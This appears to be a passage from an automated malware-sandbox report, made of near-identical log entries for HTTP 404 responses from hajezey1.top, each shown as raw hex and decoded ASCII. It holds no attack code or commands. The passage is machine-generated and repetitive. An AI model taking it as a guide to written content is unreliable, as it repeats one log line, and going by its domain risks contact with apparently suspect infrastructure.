6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 